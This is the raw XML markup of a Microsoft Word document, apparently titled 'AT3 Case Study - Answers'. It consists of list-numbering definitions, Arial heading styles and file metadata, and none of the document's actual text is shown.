    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="076E591E"/>
    <w:lvl w:ilvl="0" w:tplc="511C1F3A">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55809B4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515EF9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5E9841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A96AC0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194275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9E7A2E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B7642C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A6E8975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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="21754DA8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C0A288F2"/>
    <w:lvl w:ilvl="0" w:tplc="360014B4">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A9F465D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9D3693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AA2849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D73CB8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8D16F0F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519E84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4EAA66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8D86D4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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="25491470"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8A72A750"/>
    <w:lvl w:ilvl="0" w:tplc="509E283C">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0652F85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F66884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C96E1B6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826C068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960816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9DDEE5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411431B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70ECB0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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="297F1924"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7D524300"/>
    <w:lvl w:ilvl="0" w:tplc="C1288FE8">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62C46DB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889EACA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88DCFB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AD7AB7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8ADA435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B2FAC0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28B4CF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C2EA17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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2E1A5E00"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA563B50"/>
    <w:lvl w:ilvl="0" w:tplc="EE90B208">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89D093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D72685E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41B63C4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27AEBA7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38A6A2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B5D07B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5B0685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B5FE4D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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="392C17A1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="60A2A400"/>
    <w:lvl w:ilvl="0" w:tplc="0734C85A">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D71E31E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4F5016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488C6F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BAF843F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DDCC7B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A008B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F7DC62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F2CE61B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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4326565C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7F4C1572"/>
    <w:lvl w:ilvl="0" w:tplc="3BBC1C44">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DC88F5E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0A76D5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5F22F2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5C0A44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EA24140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3CCE32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050871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812CFB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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="46533431"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA00560E"/>
    <w:lvl w:ilvl="0" w:tplc="F0104182">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8974BB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216457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C7FCA1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EFE4A6C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43963A1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910CF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F09C39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1ECA75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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4831410E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="032E410E"/>
    <w:lvl w:ilvl="0" w:tplc="1DFA7548">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C1A43F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26BE8CF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64383BF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D088941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94DC1F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D0A803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B1B292E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19925B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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4B56754E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0270D0E0"/>
    <w:lvl w:ilvl="0" w:tplc="B630D162">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25F690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CB0AC66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080870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5EA09EA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793A41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43F47E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67BAE33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78EEC2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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4E792AFB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="40D24B5E"/>
    <w:lvl w:ilvl="0" w:tplc="C4523AD0">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8B34EAF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AE7C7C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055859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0612408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D61EE4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599295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F730B0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44CA47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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4F343CE4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66BCA1F8"/>
    <w:lvl w:ilvl="0" w:tplc="5352FE5C">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ACC6C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8694557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FCCE2C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354E6FB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D7BE0C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99CE24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15A0E63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7E46A4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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4FCC7B85"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F970E072"/>
    <w:lvl w:ilvl="0" w:tplc="FE2C694E">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3E80288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0E6A73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3B1CED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143C8C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F462DE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24D6A4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A89E1F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82BE4F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19" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="562478F9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6BE258E0"/>
    <w:lvl w:ilvl="0" w:tplc="E5DCDD50">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F582458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ACC0DB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3A6CD0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D80264F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E8BCFC4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A1B673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1834E9B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C838A6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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="56CA57B4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D33E9EC0"/>
    <w:lvl w:ilvl="0" w:tplc="D1C294FE">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82021A1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A844B9E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84449B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70364B3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A4A001C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0CD467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D89C60E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AE8A84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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5AA82705"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="53929FB2"/>
    <w:lvl w:ilvl="0" w:tplc="FD52B6BA">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B0E4B6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F634EA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54BC40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9786741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AF6AF87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4B6F63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5CE4084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FDD803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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5F8F3DBA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7CEA8B80"/>
    <w:lvl w:ilvl="0" w:tplc="140C5C9E">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90209D6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7CD224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059A5E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08D8C77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0694CC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7F4CE6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11B00C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29503A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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="62232CD1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="24043856"/>
    <w:lvl w:ilvl="0" w:tplc="BC3280FA">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6CB03D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B60A0E5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D18CA5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15DAAF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1758DC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2000A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E9C4C4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B9CC66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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="660D5603"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA46FBFE"/>
    <w:lvl w:ilvl="0" w:tplc="E1D2EA78">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A3F687A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4F34181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7D28E3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F29834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FCE8FF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560ED7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2288085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07D4A0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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6CA13CB1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F8E2A90"/>
    <w:lvl w:ilvl="0" w:tplc="2F229D8E">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E1CAA0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72C0C3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4176D6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2E223E3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F88EF4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0CCAF8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4AD895E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C0B470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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6D1B0342"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="55AAEF1A"/>
    <w:lvl w:ilvl="0" w:tplc="7BD41ABC">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FEFA872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10F839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3D9033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E1DC37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F774B1D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E162FC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CFDE0E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BB58A41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abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6EFD3FE9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3934E4B8"/>
    <w:lvl w:ilvl="0" w:tplc="12C68B6C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="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1" w:tplc="400EC8C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2" w:tplc="F12A93D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3" w:tplc="8488D2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082E42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5" w:tplc="93EC27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6" w:tplc="196834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9C223D5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lvl w:ilvl="8" w:tplc="0658D3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superscript"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1895000802">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="415134291">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1357586428">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="316348040">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1322850093">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="462772141">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2135128246">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1905137229">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="216934088">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1461337692">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1080760307">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="728768177">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1562209782">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1154680738">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="379742476">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1701320425">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1468552878">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="643389243">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="160197115">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1571891318">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1104617221">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="2122336999">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1775048827">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="2024168633">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="946741286">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1644583862">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1226525063">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="4418074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8FC"/>
    <w:rsid w:val="000C2C4B"/>
    <w:rsid w:val="000D13C1"/>
    <w:rsid w:val="009238FC"/>
    <w:rsid w:val="009C7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BF5D"/>
  <w15:docId w15:val="{29CB408A-00E1-4694-BC13-844D61D2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312" w:lineRule="auto"/>
      <w:ind w:left="450" w:hanging="29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20" w:line="328" w:lineRule="auto"/>
      <w:ind w:left="290" w:hanging="10"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="103" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="170" w:hanging="10"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="1A3C6E"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="62" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="170" w:hanging="10"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:i/>
      <w:color w:val="2E5AA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C6E"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:link w:val="Heading1"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:link w:val="Heading3"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:i/>
      <w:color w:val="2E5AA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3745</Words>
  <Characters>21353</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>177</Lines>
  <Paragraphs>50</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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AT3 Case Study - Answers</dc:title>
  <dc:subject>(unspecified)</dc:subject>
  <dc:creator>(anonymous)</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>Atchaya Chandran R</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-08-17T12:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-17T12:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>